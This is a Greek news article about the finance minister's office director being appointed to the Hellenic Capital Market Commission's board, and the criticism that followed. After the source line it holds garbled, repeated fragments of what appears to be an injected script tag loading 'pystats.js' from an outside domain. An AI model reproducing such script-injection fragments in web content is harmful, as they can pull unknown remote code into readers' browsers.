Στην Επιτροπή Κεφαλαιαγοράς η διευθύντρια του γραφείου του Γκίκα Χαρδούβελη

Στην Επιτροπή Κεφαλαιαγοράς η διευθύντρια του γραφείου του Γκίκα Χαρδούβελη

Αρνητικά σχόλια στους χρηματιστηριακούς κύκλους

Μέλος του Διοικητικού Συμβουλίου της Επιτροπής Κεφαλαιαγοράς, με πενταετή θητεία, διορίσθηκε με απόφαση του υπουργού Οικονομικών Γκίκα Χαρδούβελη η διευθύντρια του πολιτικού του γραφείου κ. Ευτυχία Μιχαηλίδου, γεγονός που έχει προκαλέσει αρνητική εντύπωση στους χρηματιστηριακούς κύκλους.

Αν και η κ. Μιχαηλίδου έχει γνώση των τραπεζικών θεμάτων (ήταν σύμβουλος επί των τραπεζικών του πρώην υπουργού Γ. Παπακωνσταντίνου) δεν συνηθίζεται οι εν ενεργεία διευθυντές πολιτικών γραφείων υπουργών να αναλαμβάνουν θέσεις σε ΔΣ φορέων και εταιρειών που εποπτεύουν, καθώς εκ των αρμοδιοτήτων τους είναι αυτοί που κάνουν και τις σχετικές εισηγήσεις για την τοποθέτηση των προσώπων στις προαναφερόμενες διοικήσεις . Όπως χαρακτηριστικά αναφέρουν στελέχη της κεφαλαιαγοράς «η κ. Μιχαηλίδου αυτοπροτάθηκε και αυτοδιορίσθηκε» στο ΔΣ της εποπτικής Αρχής.

Σε κάθε περίπτωση στο νέο Διοικητικό Συμβούλιο της Επιτροπής Κεφαλαιαγοράς πρόεδρος παραμένει ο κ. Κ. Μποτόπουλος και αντιπρόεδροι οι κ.κ. Β. Λαζαράκου και Ξ. Αυλωνίτης, ενώ ως μέλη μετέχουν – εκτός από την κ. Μιχαηλίδου – οι κ.κ. Ιωάννα Σεληνιωτάκη, Σωκράτης Λαζαρίδης και Δημήτρης Αυγητίδης.

Πηγή: newsbeast challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >